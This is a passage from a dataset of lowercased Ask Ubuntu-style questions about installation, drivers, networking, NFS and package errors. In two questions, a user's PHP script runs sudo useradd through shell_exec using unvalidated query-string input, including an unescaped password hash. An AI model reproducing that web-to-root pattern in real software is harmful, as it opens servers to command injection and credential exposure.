nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation nm10/ich7 family sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 01:00.0 ethernet controller : qualcomm atheros ar8132 fast ethernet ( rev c0 ) 02:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) any help would be much appreciated and thanks in advance !
381226	crypto swap destroyed ca n't enter to account	i am not sure it is so but i tried to check disk and it said 0.8 % of crypto swap is destroied . ubuntu start up and welcomome windows is here but i tried to use my password and it is not work . change password under root from recovery console is not functional . it said something wrong password unchanged . quest login is functional without any problems . root console ca n't start gnome . the case happened after last update . how can i fix this ?
381231	dvd or usb to install ubuntu ?	my asus notebook k53e is currently running under windows 7 . i would like to install ubuntu 12.04 alongside windows and be able to choose between these two systems each time i start the computer . i have downloaded ubuntu and burned a dvd . when restarting my computer ( with this dvd in the drive ) the dvd is ignored , i.e . windows is run as usual . when i press delete while rebooting ( still with this dvd in the drive ) a bios set up menu is shown with plenty of things to enable/unable , add , etc . but i do n't really know what to do/choose . when i exit this menu , again , the dvd is ignored , i.e . windows is run as usual . bascially : i 'm stuck . question : is it worth while trying to install ubuntu from a usb stick rather from a dvd ? i.e . is ubuntu easier to install from a usb than from a dvd ? or am i likely to run into the same kind of problems ? comment : thanks alina and dvj for your answers . so i guess the answer to my main question is : no , installation form a usb stick is not really easier than from dvd . following your advice about the boot priorities , i have now achieved a little improvement : i now get to gnu grub where i can choose to 'install ubuntu ' . unfortunately , after that the screen goes completely grey and nothing happens .
381232	useradd isnt adding a home directory even with -d flag ?	i have abit of php code ; < ? php error_reporting ( e_all ) ; ini_set ( 'display_errors ' , true ) ; ini_set ( 'display_startup_errors ' , true ) ; if ( ! empty ( $ _get ) & & ! empty ( $ _get [ 'user ' ] ) & & ! empty ( $ _get [ 'mem ' ] ) & & ! empty ( $ _get [ 'id ' ] ) & & ! empty ( $ _get [ 'k ' ] ) ) { $ user = $ _get [ 'user ' ] ; $ mem = $ _get [ 'mem ' ] ; $ id = $ _get [ 'id ' ] ; $ pass = $ _get [ 'k ' ] ; $ servername = $ user . `` - '' . $ id ; $ directory = `` /home/servers/ '' . $ servername ; $ salt = dechex ( mt_rand ( 0 , 2147483647 ) ) . dechex ( mt_rand ( 0 , 2147483647 ) ) ; echo `` user : `` . $ user ; echo `` < br/ > '' ; echo `` memory : `` . $ mem ; echo `` < br/ > '' ; echo `` server id : `` . $ id ; echo `` < br/ > '' ; echo `` pass : `` . $ pass ; echo `` < br/ > '' ; echo `` directory : `` . $ directory ; echo `` < br/ > '' ; echo `` < br/ > '' ; echo `` servername : `` . $ servername ; echo `` < br/ > '' ; if ( ! file_exists ( $ directory ) ) { mkdir ( $ directory , 0 , true ) ; } else { echo `` dir already exists ? `` ; } $ outputuser = shell_exec ( `` sudo useradd -s /bin/false -d `` .escapeshellarg ( $ directory. '' / '' ) . '' -p `` .crypt ( $ pass , $ salt ) . '' `` .escapeshellarg ( $ servername ) ) ; } ? > this outputs ; user : trotski94 memory : 1024 server id : 1 pass : test directory : /home/servers/trotski94-1 servername : trotski94-1 dir already exists ? and when i cat /etc/passwd it shows trotski94-1 : x:1001:1001 : :/home/servers/trotski94-1/ : /bin/false yet when i login as trotski94-1 it has theres no home directory , using home=/ what is happening here ? ( btw i added the . `` / '' to the end of the directory as a test , ive tried it without that before incase anyone suggests it )
381234	qtcreator crashes on registering namespace	i just installed ubuntu 13.10 ( desktop ) x64 on my computer and wanted to install qt5 with qtcreator . so , i downloaded it from : http : //qt-project.org/downloads http : //download.qt-project.org/official_releases/online_installers/1.4/qt-linux-opensource-1.4.0-2-x86_64-online.run after i got the installation running , by executing the .run file from the terminal , i tried to start qtcreator . it starts up , but within a minute it crashes . when i try to launch qtcreator from the terminal by running the bash script in : /opt/qt/tools/qtcreator/bin/qtcreator.sh the same thing happends , but it crashes with the following message : qsqldatabaseprivate : :adddatabase : duplicate connection name 'qhelpcollectionhandler-20391584-4 ' , old connection removed . qsqlquery : :prepare : no driver qsqlquery : :prepare : no driver error registering namespace ' `` org.qt-project.qtgui.502 '' ' from file ' `` /opt/qt//5.0.2/gcc_64/doc/qtgui.qch '' ' : `` can not register namespace 'org.qt-project.qtgui.502 ' ! '' segmentation fault ( core dumped ) the last message 'segmentation fault ' looks like some kind of buffer overflow to me . i googled around for a bit , but my search turned up nothing . i was unable to find a solution , or even somebody with the same problem . does anyone know what causes qtcreator to crash , and how i can fix this ? or does somebody have some options i can try to get this thing working ? p.s i of course tried re-installing and turning the computer off and on .
381235	adding nodes to maas server ? . .	we have installed maas on one system . we want to add nodes to the maas server what is the good way to do it ? . can u give us a link or a step by step instructions to do the same
381236	after downgrade of nvidia driver can not start nvidia settings in ubuntu 12.04	i have some issues with nvidia settings and ca n't get what 's the problem ? i dowgraded my recommended nvidia driver to older version and everything seems to be fine the resolution and video , so on , i just ca n't start nvidia settings using terminal , do n't know why ? nvidia present at startup applications and whatever ... here 's some details from terminal : kernel driver in use : nvidia jockey-text -l xorg : nvidia_173_updates - nvidia accelerated graphics driver ( post-release updates ) ( proprietary , enabled , in use ) xorg : nvidia_304 - nvidia accelerated graphics driver ( proprietary , disabled , not in use ) xorg : nvidia_304_updates - nvidia accelerated graphics driver ( post-release updates ) ( proprietary , disabled , not in use ) sudo nvidia-xconfig warning : unable to locate/open x configuration file . new x configuration file written to '/etc/x11/xorg.conf' after this i rebooted the system xorg.conf seems to be present now in /etc/x11/xorg.conf but if i run in terminal nvidia-settings still says : command not found i also ran gksudo nvidia-settings as a root but after all still says : command not found i 've read similar posts to this , but still confused .
381237	unity does not work after reinstall	i started out with ubuntu 12.04 lts . then , i installed kde ( by using sudo apt-get install plasma-desktop ) , removed unity ( by using sudo apt-get remove unity unity-2d unity-2d-shell compiz ) , installed kubuntu-full and removed ubuntu-core , ubuntu-desktop and ubuntu-full . then , i did sudo do-release-upgrade and went to 12.10 . then , i did sudo do-release-upgrade -m=kubuntu to hopefully complete the switch to kubuntu 13.04 . after that , i decided that i wanted unity back to develop phone apps with the ubuntu sdk . and with the good unity integration with kde applications , i tried to install unity using sudo apt-get install unity unity-2d . installation completes without error . but when i logged out , unity was n't an option . restarted system , booted into text mode , un-installed kde-lightdm-greeter and installed unity-greeter . still , sudo lightdm brings me to what looks like something between gnome 3 and unity in the login screen . buttons were not visible , icons misplaced and sometimes not present and when logging in , takes me to kde . can anyone help me with this ?
381238	wifi does not work with internet	i just cretaed a dual boot windows/ubuntu . my wifi works properly in windows , but it does not let me go on the internet when in ubuntu . dhcp seems to work since i apparently received a 192.168.1.3 address that btw is the only one i can ping . i can neither ping the router address ( that is 192.168.1.1 . ) i had a look at some config file , and i can see the wlan with iwconfig , but in the /etc/network/interfaces file there is nothing but auto lo iface lo inet loopback it seems strange to me ( but yes , maybe is because i 'm just a developer ) not seeing anything about wlan0 . what can be the problem ? wifi card adater is d-link n 150 micro usb adaper dwa 121 ubuntu version 12.04 lts chip on the pen is rtl8188 edit as per @ innerand suugestion i downloaded from another computer the backport , but trying to install i 've got a dependency not found : [ sudo ] password for fpollano : selecting previously unselected package linux-backports-modules-cw-3.6-3.2.0-56-generic : i386 . ( reading database ... 140014 files and directories currently installed . ) unpacking linux-backports-modules-cw-3.6-3.2.0-56-generic : i386 ( from linux-backports-modules-cw-3.6-3.2.0-56-generic_3.2.0-56.45_i386.deb ) ... dpkg : dependency problems prevent configuration of linux-backports-modules-cw-3.6-3.2.0-56-generic : i386 : linux-backports-modules-cw-3.6-3.2.0-56-generic : i386 depends on linux-image-3.2.0-56-generic . dpkg : error processing linux-backports-modules-cw-3.6-3.2.0-56-generic : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-29-generic warning : no support for locale : en_gb.utf8 errors were encountered while processing : linux-backports-modules-cw-3.6-3.2.0-56-generic : i386 fpollano @ ubuntu : /tmp $ no idea on how to find what is missing
381242	lockscreen login problem	when using lock/switch account the password is correct when i try to sign back on during a lock but says its wrong . this makes me have to reboot to be able to get back on again .
381244	how can i activate a desktop environment ?	sorry if this is an incredibly stupid question , but i 'm new to linux on a whole & i 'm trying hard to get into the flow with it . i recently installed lxde which as you know is a de , but i ca n't find any info on the net on how to activate it . could anyone please help me ? thanks in advance guys .
381251	types of taskbar	i want to know whats types of taskbar exist for ubuntu ? i know tint2 but exist any others ? http : //www.ubuntudicas.com.br/blog/2011/10/adicione-uma-barra-de-tafefas-no-ubuntu/
381253	problems with sound on asus eee ps t91mt	i 've installed ubuntu 12.04 on my eee pc , and i have problems with sound . the thing is that it plays all sounds , music etc . in some kind of `` fast forward '' . this makes watching videos or even chatting in skype impossible ? how to fix that problem ?
381261	file system and mount point	i am trying to install ubuntu 13.04 alongside windows 7 . the partition that ubuntu picked up on and tried to install on , was n't big enough . i created a new partition but i need the file system that ubuntu runs on , and the mount point .
381262	harddisk has an attribute error	i am using ubuntu 13.10 and windows7 as dual boot the problem is that when i click on windows7 partition it doesnt show any startup on the monitor can you please help me
381267	no bootable media found ( installing ubuntu )	i 'm trying to install ubuntu 12.04.3 lts on my brand new zotac zbox nano pc , and i ca n't get it to recognize the cd or dvd as bootable media . i 'm sure it 's not a hw or bios problem because i can recognize and boot from other cd 's using the same drives and bios settings as bootable media , just not the ubuntu one . i 've tried burning my ubuntu iso using 2 different burning apps ( windows 8 explorer and powerdvd ) , 2 different kinds of media ( cd , dvd rom ) , 3 different ubuntu images ( 12.04s , 13.10s , 12.04d ) , and 2 different kinds of media : usb external dvd drive , and usb thumb drive ( both of which are successfully recognized by the bios as bootable ) . as soon as i swap out any of the ubuntu discs for my freedos bootable disk ( burned onto same type of media with same burning software ) , zotac recognizes and boots right away . but switching back to any ubuntu dvd , the bios prints another message that `` no bootable media is found in the drive '' . does anyone know if there is a trick to burning an iso and making the media bootable ? i did let windows 8 do a `` verify '' after burning and it said there is no problem . i can see there is a `` boot/grub/ '' directory and `` .disk/ '' directory on the ubnutu cd .
381269	brasero is exiting with 0 : no message error	i am attempting to burn an audio project to a cd-r using brasero , but it quits with an unknown error . the log gives this ( towards the end when the errors begin ) : braserowodim called brasero_job_get_flags braserowodim stderr : status : 0x2 ( check condition ) braserowodim called brasero_job_get_flags braserowodim stderr : sense bytes : f1 00 03 00 00 3f de 0a 00 2b 00 00 0c 00 00 00 braserowodim called brasero_job_get_flags braserowodim stderr : sense key : 0x3 medium error , deferred error , segment 0 braserowodim called brasero_job_get_flags braserowodim stderr : sense code : 0x0c qual 0x00 ( write error ) fru 0x0 braserowodim called brasero_job_get_flags braserowodim stderr : sense flags : blk 16350 ( valid ) braserowodim called brasero_job_get_flags braserowodim stderr : cmd finished after 6.188s timeout 200s braserowodim called brasero_job_get_flags braserowodim stderr : wodim : a write error occured . braserowodim called brasero_job_get_flags braserowodim stderr : wodim : please properly read the error message above . braserowodim called brasero_job_get_flags braserowodim stdout : track 02 : 1 of 53 mb written ( fifo 100 % ) [ buf 98 % ] 8.0x . braserowodim called brasero_job_get_media braserowodim called brasero_job_get_action braserowodim called brasero_job_set_current_action braserowodim stdout : write track data : error after 2095632 bytes braserowodim stdout : writing time : 63.356s braserowodim stdout : average write speed 114.2x . braserowodim stdout : min drive buffer fill was 97 % braserowodim stdout : fixating ... braserowodim called brasero_job_get_action braserowodim called brasero_job_set_current_action braserowodim stdout : fixating time : 0.001s braserowodim stderr : wodim : fifo had 884 puts and 630 gets . braserowodim called brasero_job_get_flags braserowodim stderr : wodim : fifo was 0 times empty and 629 times full , min fill was 99 % . braserowodim called brasero_job_get_flags braserowodim stdout : burn-free was never needed . braserowodim stderr : hup braserowodim stdout : hup braserowodim process finished with status 254 braserowodim called brasero_job_error braserowodim finished with an error braserowodim asked to stop because of an error error = 0 message = `` no message '' braserowodim stopping session error : unknown ( brasero_burn_record brasero-burn.c:2859 ) it got to 5 % and then ejected the disk ( on which i can see no burn marks ) and gave me this . i have the normalization plugin turned off , because of the known bug , so that should n't be affecting anything . however , i attempted this as sudo via sudo brasero and now the program can not recognize the blank disks in either sudo or as a regular user ! does anyone have any clue on what could be going wrong and how to be able to burn this audio disk ? help !
381273	mounted nfs shared folder does not have my files	i do n't understand something so i 'm hoping someone can help me with it . i have two computers connected to each oher . one is a nfs server and one id nfs client . on nfs server i have a folder in my home directory called > /home/baxy/shared and my hope was that this dir will be visible form the other computer . i edited > /etc/fstab so that my folder is automatically loaded at startup /home/baxy/shared /export/baxy/shared none bind 0 0 oh yea i created the export directory also on my other comp ( nfs client ) i also edited fstab : 10.0.1.10 : /export/baxy/shared /home/baxy/shared nfs auto 0 0 when i restart everything i see my shared dir on my nfs client . however when i put some file in shared directory on server i do n't see it until i restart my machines . i was under the impression that once i put something in my shared dir on nfs server i 'll see it on the client but i do not . could it be that this is because i am first mounting the shared dir to export and then export to my nfs client ? ? ? how to make something i place in my shared dir automatically visible to my nfs client ? ?
381274	check cuda gpu usage	i 've been number crunching using boinc for several years now and i 'm starting to get into more computational stuff that uses cuda . i was wondering if there is a way to check which processes are making use of cuda at any given point . i 'm using an nvidia geforce 8400 gs if it helps . i 've poked around a bit on the web and the best recommendation i got was to use nvidia-smi . however , upon some more poking around , i found that nvidia-smi only gives an output for some graphics cards ( my geforce is not among them ) . hence the following output : + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | nvidia-smi 5.319.32 driver version : 319.32 | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- + | gpu name persistence-m| bus-id disp.a | volatile uncorr . ecc | | fan temp perf pwr : usage/cap| memory-usage | gpu-util compute m. | |===============================+======================+======================| | 0 geforce 8400gs off | 0000:01:00.0 n/a | n/a | | 30 % 74c n/a n/a / n/a | 282mb / 511mb | n/a default | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- + + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | compute processes : gpu memory | | gpu pid process name usage | |=============================================================================| | 0 not supported | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ any help or suggestions would be appreciated .
381275	normal.mod not found || ubuntu 12.10	i have trouble after install ubuntu 12.10 on my asus laptop . error : file '/boot/grub/x86_64-efi/normal.mod ' not found grub_rescue > please give me the solution ? thanks
381276	do n't know how to set up wireless network connection in ubuntu	i do n't really have any experience with ubuntu yet , so keep that in mind . i have a pc that runs windows xp on one side and ubuntu on the other . my internet works great on xp , but i am unsure how to set it up on the ubuntu side . it does not detect any networks in range , even though my wireless adapter is still plugged in and my internet is still connecting on other computers ( also windows ) . i have gotten to the window in ubuntu to set up a wireless connection , but i do n't know how to make it work . please help .
381277	installed but can not run ubuntu 12.04.3	i recently installed ubuntu 12.04.3 on my asus vivobook s400ca alongside windows 8 following a guide i found here . after a couple of starts and stops , i eventually was able to install ubuntu on my computer , but once i restarted after installation , there was no option to run ubuntu . i checked my bios to see a way to boot ubuntu from there , but there was no option to boot ubuntu . i tried accessing the boot menu while restarting , but again , there was no option for ubuntu . i thought that it might not have installed properly , and so tried installing it again , but the installer said my computer already has ubuntu installed . any suggestions on how to run ubuntu now ? any ideas on what might be going wrong ?
381283	upower do not execute power.d scripts if started on ac power	if i turn on my notebook on ac power then upowerd igneres power.d scripts . the output of $ upower -d ... on-battery : no does not change to `` on-battery : yes '' if i pull the power cable . but if i restart the notebook on battery upower works correctly . indicator works in all cases good . i have ubuntu 13.10 on sony vaio .
381289	creating an upstart command for teamviewer to restart if closed	i am trying to create a .conf file for teamviewer , to automatically restart it if is closed . does anyone know how to do this ? i am running ubuntu 12.04
381290	ruby 2.0.0 rvm error installing on ubuntu 13.10	ruby 2.0.0 rvm error installing on ubuntu 13.10 : error running 'requirements_debian_update_system ruby-2.0.0-p353 ' , please read /home/sergey/.rvm/log/1385231754_ruby-2.0.0-p353/update_system.log requirements installation failed with status : 100 who knows if it only for my computer or for all ubuntu 13.10 ?
381291	dpkg : error processing mfc8500lpr : i386 ( -- remove )	i uninstalled this package with synaptic but it does not appear to have been completely removed . i used autoremove and the result is below . reviewed several help requests but non seemed to work . can someone let me know what might work ? reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : language-pack-kde-en language-pack-kde-en-base mfc8500lpr : i386 0 upgraded , 0 newly installed , 3 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 3,388 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 422194 files and directories currently installed . ) removing mfc8500lpr : i386 ... /var/lib/dpkg/info/mfc8500lpr.postrm : 3 : /var/lib/dpkg/info/mfc8500lpr.postrm : /etc/init.d/lpd : not found dpkg : error processing mfc8500lpr : i386 ( -- remove ) : subprocess installed post-removal script returned error exit status 127 removing language-pack-kde-en-base ... removing language-pack-kde-en ... processing triggers for software-center ... info : softwarecenter.db.update : no translation information in database needed processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... errors were encountered while processing : mfc8500lpr : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) output requested cupswrappermfc8500 : i386 1.0.2-1 brother mfc8500 cups wrapper driver rc dmraid 1.0.0.rc16-4.1ubuntu8 device-mapper software raid support tool rc fbreader 0.12.10dfsg-6 e-book reader rc firstboot-video 2.3 plays a video at firstboot . rc kde-l10n-engb 4:4.8.5-0ubuntu0.1 british english ( engb ) localization for kde rc kpartx-boot 0.4.9-3ubuntu5 provides kpartx during boot rc language-pack-kde-en-base 1:12.04+20130128 kde translations for language english rc libdebconfclient0 0.158ubuntu1 debian configuration management system ( c-implementation library ) rc libdebian-installer4 0.79ubuntu2.1 library of common debian-installer functions rc libdmraid1.0.0.rc16 1.0.0.rc16-4.1ubuntu8 device-mapper software raid support tool - shared library rc libept1.4.12 1.0.6~exp1ubuntu1 high-level library for managing debian package information rc liblinebreak2 2.1-1 line breaking library for unicode ( shared library ) rc libubuntuoneui-3.0-1 3.0.1-0ubuntu1 ubuntu one widget library rc libzlcore0.12 0.12.10dfsg-6 zlibrary cross-platform development library ( shared library ) rc libzltext0.12 0.12.10dfsg-6 zlibrary text model/viewer part ( shared library ) rc oem-config 2.10.20 perform end-user configuration after initial oem installation rc oem-config-gtk 2.10.20 gtk+ frontend for end-user post-oem-install configuration rc oobe-dim-disable 1.0 disables screen dimming . rc pdfedit 0.4.5-2 editor for manipulating pdf documents rc synaptic 0.75.9ubuntu1 graphical package manager rc ubuntu-recovery-bootloader 0.3.35yongkang5 bootloader images for ubuntu 's factory process rc user-setup 1.42ubuntu3
381292	no root file defined at installation	i 'm a complete stranger with ubuntu , and i 've run into a problem with installing . what i am trying to do , is to install ubuntu 13.10 to my old laptop . this laptop has a new hard-drive , that is completely empty . so no windows or other operating systems to work with . i 'm booting my computer with usb , and it starts normally , but ass i press `` install now '' instead of `` try ubuntu '' , then those problems really start . it gives me message `` no root file system defined.. '' etc . what to do ?
381294	ubuntu 13.10 installer not detecting windows 8 partitions	i have a 1tb hardisk with windows 8 installed on a 70 gb partition the ubuntu installer wont detect my windows 8 and other partitions . inside ubuntu i can see my other disks , but the installer only sees my hard ask 1 tb please suggest a solution
381296	wrong arp table entries after reboot	i created two virtualbox machines , both with lubuntu server 13.10 . server machine has virtualbox nat network and internal network ( static ip 192.168.1.1 ) , client machine has only internal network adapter ( static ip 192.168.1.2 ) and it 's connecting to the internet via server machine ( server works as a gateway ) . i assigned static local ip to both of them and created some iptables rules . everything is working except of one thing - client can not ping ( or connect to ) anyone ( server machine or the internet ) until server computer sends him a ping ( ping 192.168.1.2 ) . after just a few ping packets , client computer `` unlocks '' and everything is working fine . server ifconfig : eth0 link encap : ethernet hwaddr 08:00:27:20:03:00 inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe20:300/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:260 errors:0 dropped:0 overruns:0 frame:0 tx packets:310 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:32003 ( 32.0 kb ) tx bytes:32378 ( 32.3 kb ) eth1 link encap : ethernet hwaddr 08:00:27 : fd:7d : aa inet addr:192.168.1.1 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fefd:7daa/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:34 errors:0 dropped:0 overruns:0 frame:0 tx packets:54 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8537 ( 8.5 kb ) tx bytes:9206 ( 9.2 kb ) server iptables : iptables -f iptables -f -t nat iptables -x -t nat iptables -f -t filter iptables -x -t filter iptables -p forward accept iptables -p input accept iptables -p output accept iptables -a input -i lo -j accept iptables -a input -i eth1 -j accept iptables -a input -i eth0 -s 10.0.2.15 -j drop iptables -a input -m state -- state related , established -j accept echo `` 1 '' > /proc/sys/net/ipv4/ip_forward iptables -a forward -i eth1 -o eth0 -s 192.168.1.0/255.255.255.0 -d 0/0 -j accept iptables -t nat -a postrouting -s 192.168.1.0/255.255.255.0 -d 0/0 -j masquerade client ifconfig : eth0 link encap : ethernet hwaddr 08:00:27:2d : ec:78 inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe2d : ec78/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6 errors:0 dropped:0 overruns:0 frame:0 tx packets:82 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:461 ( 461.0 b ) tx bytes:11601 ( 11.6 kb ) client iptables : iptables -f iptables -f -t nat iptables -x -t nat iptables -f -t filter iptables -x -t filter iptables -p forward drop iptables -p input drop iptables -p output accept iptables -a input -i lo -j accept iptables -a input -i eth0 -j accept iptables -a input -m state -- state related , established -j accept i disabled ufw , but the problem persist . i also checked virtualbox settings and they appear to be fine . edit : i figured out what 's wrong - after every reboot client has wrong arp table : how can i fix that ? sometimes arp -d 192.168.1.1 works , but usually i ca n't get rid of that strange mac address ... i changed mac address to one seen on a screen above . it did n't helped - after few restarts , mac address switched again .
381300	give www-data write permission to /home ?	i have a problem on my server , i have a folder i set up /home/servers . but when i try to create a user in it with /home/servers/username ( creating the directory before i create the user ) i then use useradd -s /bin/false -d /home/servers/username -p encryptedpassword username , but this doesnt work and my even though in /etc/passwd the home dir is listed correctly , but when logged in it responds that there is no home directory , default home=/ . now if useradd -s /bin/false -d /home/username -p encryptedpassword username , it all works correctly but www-data needs access to /home to be able to create directorys ( the users are actually created through a php script , along with the directory . hence why www-data needs access to all of this ) how can i work around any of this , in the easiest and safest way possible ? i have a php page , when that php page is exectuted it creates the directory /home/servers/username then executes the shell command useradd -s /bin/false -d /home/servers/username -p encryptedpassword username ( do not worry about the permissions of anything to do with the php , that all works fine and the problem persists even when entered directly into the terminal ) , hence the need for www-data write permissions on /home/servers . the only problem is , when attempting to log in as one of these users , it says the user has no home directory and it is defaulting home=/ , when i run the command as useradd -s /bin/false -d /home/username -p encryptedpassword username everything works fine , but no matter what i do i cant give www-data write permissions to /home so that method can not work for me either . i need a way of my php code ( www-data group ) being able to create the directory and the user actually have it work correctly for them .
381305	where is startup disk creator installed ?	using xfce . i installed usb-creator , also called startup disk creator using the ubuntu software center . where is this installed ? it does not show up anywhere in the menu . in the terminal i 've tried different commands like usb-creator-common , usb-creator-kde , etc . program can not be found . i like linux , but this is one of those things that i think is just really sad in linux or more specifically ubuntu . if the software centre does not even tell you what the executable name is and where it 's stored , how the hell does it expect the user to locate the application ? i suppose i could check the various bin-folders , but the executable names are sometimes unclear as to their nature .
381306	how to find duplicat photos ( tagged and no tags ) ?	i 've got a pretty sizeable collection of photos on my nas . i used shotwell to manage them and have added a number of tags to make it easier . the problem is that at some point i reimported a big chunk of the collection and shotwell rightly decided that untagged photos are different from the same tagged ones and reimported them . so now i have same tagged and untagged photos and it 's a pain to remove the duplicates manually . i wonder if it is possible at all to remove them automatically .
381311	how to install ubuntu on usb drive ( not live simulation )	i want to install ubuntu on my usb disk . but not as a live cd . i want to connect to a pc , and boot my ubuntu as on a normal pc . so that i can make changes and install new programs . with a live cd is this not possible . all the tools that i saw here were tools to create a live usb disk . but this is not really what i want .
381315	do n't know the ubuntu 's password ! how to uninstall ubuntu ?	i got my laptop with ubuntu however , i have no idea about the password that was set on it . how may i uninstall it ?
381319	software recommendations for graphics-centric ubuntu system ?	i want to buy a new computer and install ubuntu . i 'm artist , i work a lot with photoshop , corel draw , illustrator , final cut , sound studio , dvd studio . i 've never used ubuntu graphic programs before . on this page i would like to figure out which ingredients would best work for graphic ( multimedia ) purposes : could you please offer some examples as to how much of a certain element i might need to buy ? finally : can you recommend a computer best compatible with ubuntu ?
381323	can i run starcraft : broodwar on ubuntu ?	im currently running mavericks on my macbookpro ( late 2008 ) and want to get a different os that will run starcraft 1 : broodwar , without using wine .
381325	installed ubuntu 12.04 , now i only get terminal and no desktop	i only get the standard desktop after running startx in terminal . i tried running sudo apt-get -f install -- reinstall ubuntu-desktop xorg build-essential but got : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-desktop : depends : baobab but it is not going to be installed depends : eog but it is not going to be installed depends : evince but it is not going to be installed depends : file-roller but it is not going to be installed depends : gcalctool but it is not going to be installed depends : gedit but it is not going to be installed depends : gnome-control-center but it is not going to be installed depends : gnome-font-viewer but it is not going to be installed depends : gnome-media but it is not going to be installed depends : gnome-nettool but it is not going to be installed depends : gnome-power-manager but it is not going to be installed depends : gnome-screenshot but it is not going to be installed depends : gnome-session but it is not going to be installed depends : gnome-session-canberra but it is not going to be installed depends : gnome-system-log but it is not going to be installed depends : gnome-system-monitor but it is not going to be installed depends : gnome-terminal but it is not going to be installed depends : gucharmap but it is not going to be installed depends : language-selector-gnome but it is not going to be installed depends : nautilus but it is not going to be installed depends : nautilus-sendto but it is not going to be installed depends : notify-osd but it is not going to be installed depends : seahorse but it is not going to be installed depends : software-center but it is not going to be installed depends : software-properties-gtk but it is not going to be installed depends : ssh-askpass-gnome but it is not going to be installed depends : system-config-printer-gnome but it is not going to be installed depends : ubuntu-artwork but it is not going to be installed depends : unity but it is not going to be installed depends : unity-2d but it is not going to be installed depends : unity-greeter but it is not going to be installed depends : update-manager but it is not going to be installed depends : update-notifier but it is not going to be installed depends : xdg-user-dirs-gtk but it is not going to be installed depends : xdiagnose but it is not going to be installed depends : yelp but it is not going to be installed depends : zenity recommends : acpi-support but it is not going to be installed recommends : activity-log-manager-control-center but it is not going to be installed recommends : aisleriot but it is not going to be installed recommends : apport-gtk but it is not going to be installed recommends : brasero but it is not going to be installed recommends : deja-dup but it is not going to be installed recommends : empathy but it is not going to be installed recommends : firefox but it is not going to be installed recommends : firefox-gnome-support but it is not going to be installed recommends : fonts-liberation but it is not going to be installed recommends : fonts-takao-pgothic but it is not going to be installed recommends : ginn but it is not going to be installed recommends : gnome-bluetooth but it is not going to be installed recommends : gnome-disk-utility but it is not going to be installed recommends : gnome-orca but it is not going to be installed recommends : gnome-screensaver but it is not going to be installed recommends : gnome-sudoku but it is not going to be installed recommends : gnomine but it is not going to be installed recommends : gvfs-fuse but it is not going to be installed recommends : gwibber but it is not going to be installed recommends : ibus but it is not going to be installed recommends : ibus-gtk3 but it is not going to be installed recommends : ibus-pinyin but it is not going to be installed recommends : ibus-table but it is not going to be installed recommends : jockey-gtk but it is not going to be installed recommends : landscape-client-ui-install but it is not going to be installed recommends : libgail-common but it is not going to be installed recommends : libreoffice-calc but it is not going to be installed recommends : libreoffice-gnome but it is not going to be installed recommends : libreoffice-help-en-us but it is not going to be installed recommends : libreoffice-impress but it is not going to be installed recommends : libreoffice-math but it is not going to be installed recommends : libreoffice-style-human but it is not going to be installed recommends : libreoffice-writer but it is not going to be installed recommends : mahjongg but it is not going to be installed recommends : mousetweaks but it is not going to be installed recommends : nautilus-share but it is not going to be installed recommends : network-manager-gnome but it is not going to be installed recommends : network-manager-pptp-gnome but it is not going to be installed recommends : onboard but it is not going to be installed recommends : overlay-scrollbar but it is not going to be installed recommends : remmina but it is not going to be installed recommends : rhythmbox but it is not going to be installed recommends : rhythmbox-plugin-magnatune but it is not going to be installed recommends : rhythmbox-ubuntuone but it is not going to be installed recommends : shotwell but it is not going to be installed recommends : simple-scan but it is not going to be installed recommends : thunderbird but it is not going to be installed recommends : thunderbird-gnome-support but it is not going to be installed recommends : totem but it is not going to be installed recommends : totem-mozilla but it is not going to be installed recommends : transmission-gtk but it is not going to be installed recommends : ubuntu-docs but it is not going to be installed recommends : ubuntuone-client-gnome but it is not going to be installed recommends : ubuntuone-installer but it is not going to be installed recommends : usb-creator-gtk but it is not going to be installed recommends : vino but it is not going to be installed e : unable to correct problems , you have held broken packages . any idea what am i dealing with here ?
